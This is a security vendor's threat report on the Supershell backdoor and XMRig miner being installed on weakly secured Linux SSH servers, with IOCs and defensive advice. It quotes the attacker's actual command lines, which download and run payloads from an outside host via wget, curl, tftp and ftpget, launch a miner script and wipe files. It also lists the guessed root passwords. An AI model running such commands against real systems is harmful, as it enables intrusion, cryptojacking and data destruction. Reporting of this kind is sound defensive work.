Supershell Malware Being Distributed to Linux SSH Servers
AhnLab SEcurity intelligence Center (ASEC) has recently discovered an attack case installing the Supershell backdoor on inadequately managed Linux SSH servers. Created by a Chinese-speaking developer, Supershell is developed in the Go language and supports various platforms including Windows, Linux, and Android. Its primary function is a reverse shell, which allows a threat actor to remotely control an infected system.
Figure 1. GitHub page of Supershell
It is suspected that the threat actor installed a scanner after infecting multiple systems and then attempted to log in through dictionary attacks from the following attack sources.
| Threat Actor IP | ID/PW |
|---|---|
| 209.141.60[.]249 | root / qwer |
| 179.61.253[.]67 | root / password root / a123456789 root / a1234567 root / newroot root / 123qaz!@# root / Passw0rd root / 123qweASD root / abc123 root / daniel root / 1qaz@wsx |
| 107.189.8[.]15 | root / doctor |
| 2.58.84[.]90 | root / Admin123! root / 123456qwerty root / cocacola root / qweasd!@# |
Table 1. Attack source addresses and credential information used during the login attempt process
After successfully carrying out the attack, the threat actor executed commands (see Table 2) to directly install Supershell or install a shell script that serves as a downloader. Supershell was downloaded not only through web servers but also via FTP servers.
| # cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r * # cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * # cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r * # cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r * # cd /tmp ; curl -s -L hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx ; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x ssh1 ; ./ssh1 ; rm -r ssh1 |
Table 2. Commands identified in the attack case
The malware that is ultimately installed is obfuscated, but it can be identified as the Supershell backdoor through a few internal strings, its behavior, and the strings observed during its execution process.
Figure 2. Obfuscated Supershell
Figure 3. Log showing Supershell’s execution
In attacks targeting poorly managed Linux systems, it is common to see the installation of CoinMiners like XMRig or DDoS bots such as ShellBot and Tsunami. In the attack observed this time, the threat actor initially installed Supershell for control hijacking purposes. However, given that there are cases where XMRig Monero CoinMiners are also installed alongside Supershell, it appears that the attacker’s ultimate goal is to mine cryptocurrency.
| 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx |
Table 3. Threat actor’s Monero wallet address
Recently, Supershell has been installed on poorly managed Linux SSH servers. When the backdoor malware is installed, a Linux server can receive commands from the threat actor and be hijacked.
As such, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access from threat actors. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.
Detection Names
Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00)
Downloader/Shell.Agent.SC203780 (2024.09.11.00)
Downloader/Shell.ElfMiner.S1705 (2021.11.29.02)
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
